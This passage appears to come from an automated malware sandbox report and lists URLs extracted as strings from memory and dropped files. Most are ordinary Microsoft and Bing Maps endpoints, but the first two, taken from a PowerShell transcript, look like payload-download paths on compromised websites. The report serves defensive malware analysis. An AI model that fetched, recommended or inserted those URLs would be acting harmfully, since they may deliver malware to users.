            Source: PowerShell_transcript.767316.L3ypsoUw.20200802010517.txt.2.drString found in binary or memory: http://www.najcosmetics.com/img/hvglv_hay_35sacodg/
            Source: PowerShell_transcript.767316.L3ypsoUw.20200802010517.txt.2.drString found in binary or memory: http://www.oxahaus.com/wp-admin/d8teb_n0v0h_dm0uyok/
            Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
            Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
            Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.drString found in binary or memory: https://api.aadrm.com/
            Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.drString found in binary or memory: https://api.diagnostics.office.com
            Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
            Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.drString found in binary or memory: https://api.microsoftstream.com/api/
            Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.drString found in binary or memory: https://api.onedrive.com
            Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
            Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
            Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
            Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.drString found in binary or memory: https://apis.live.net/v5.0/
            Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.drString found in binary or memory: https://app.powerbi.com/taskpane.html
            Source: svchost.exe, 00000009.00000003.303181405.0000021A4FC60000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
            Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
            Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
            Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.drString found in binary or memory: https://augloop.office.com
            Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
            Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.drString found in binary or memory: https://cdn.entity.
            Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
            Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
            Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
            Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
            Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.drString found in binary or memory: https://clients.config.office.net/
            Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
            Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
            Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
            Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
            Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
            Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.drString found in binary or memory: https://config.edge.skype.com
            Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
            Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
            Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.drString found in binary or memory: https://cortana.ai
            Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.drString found in binary or memory: https://cr.office.com
            Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.drString found in binary or memory: https://dataservice.o365filtering.com
            Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.drString found in binary or memory: https://dataservice.o365filtering.com/
            Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
            Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
            Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
            Source: svchost.exe, 00000009.00000003.303196281.0000021A4FC49000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
            Source: svchost.exe, 00000009.00000003.303181405.0000021A4FC60000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
            Source: svchost.exe, 00000009.00000002.304091742.0000021A4FC3D000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
            Source: svchost.exe, 00000009.00000003.303181405.0000021A4FC60000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
            Source: svchost.exe, 00000009.00000002.304110794.0000021A4FC52000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
            Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
            Source: svchost.exe, 00000009.00000003.303181405.0000021A4FC60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
            Source: svchost.exe, 00000009.00000002.304091742.0000021A4FC3D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
            Source: svchost.exe, 00000009.00000003.303181405.0000021A4FC60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
            Source: svchost.exe, 00000009.00000003.303181405.0000021A4FC60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
            Source: svchost.exe, 00000009.00000003.303181405.0000021A4FC60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
            Source: svchost.exe, 00000009.00000003.303245112.0000021A4FC41000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
            Source: svchost.exe, 00000009.00000003.303245112.0000021A4FC41000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
            Source: svchost.exe, 00000009.00000003.303181405.0000021A4FC60000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
            Source: svchost.exe, 00000009.00000003.303228259.0000021A4FC40000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
            Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
            Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.drString found in binary or memory: https://devnull.onenote.com
            Source: 30CF9303-C476-4DFB-B041-41B426BAEEAE.0.drString found in binary or memory: https://directory.services.
            Source: svchost.exe, 00000009.00000003.303196281.0000021A4FC49000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
            Source: svchost.exe, 00000009.00000002.304124150.0000021A4FC5C000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
            Source: svchost.exe, 00000009.00000002.304124150.0000021A4FC5C000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
            Source: svchost.exe, 00000009.00000002.304110794.0000021A4FC52000.00000004.00000001.sdmp, svchost.exe, 00000009.00000003.303196281.0000021A4FC49000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
            Source: svchost.exe, 00000009.00000003.303181405.0000021A4FC60000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
            Source: svchost.exe, 00000009.00000002.304091742.0000021A4FC3D000.00